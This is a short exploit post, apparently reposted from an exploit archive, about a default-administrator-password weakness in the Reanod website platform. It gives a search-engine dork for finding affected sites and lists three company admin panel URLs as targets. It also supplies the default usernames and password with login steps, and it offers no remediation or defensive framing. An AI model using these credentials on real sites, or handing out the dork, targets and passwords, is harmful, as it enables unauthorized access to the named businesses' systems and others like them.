Reanod Default Admin Password Vulnerability tested BackBox GNU/Linux


[Information Exploit]

[+] Exploit Title: Reanod Default Admin Password Vulnerability
[+] Author : TrazeR & AKINCILAR
[+] Vendor Home: http://www.reanod.com/
[+] Dork : intext:"Powered by reanod"
[+] Tested on : BackBox 5.1, Chrome

[Site Target]

- http://www.ynfmachineryparts.com/admin/
- http://www.queenta-precision.com/admin
- http://www.ricemachinechina.com/admin

[Poc Default Admin]

[+] Dorking İn Google Or Other Search Enggine
[+] Manager-Url: /admin
[+] UserName: Reanod68 OR ===> admin
[+] Password: reanod6688

[+] Poc local Admin : /admin
http://www.queenta-precision.com/admin

Enter username and password
UserName: Reanod68 OR ===> admin
Password: reanod6688


if you still don't understand please refer to this video


Sumber : [cxsecurity.com]
Previous
Next Post »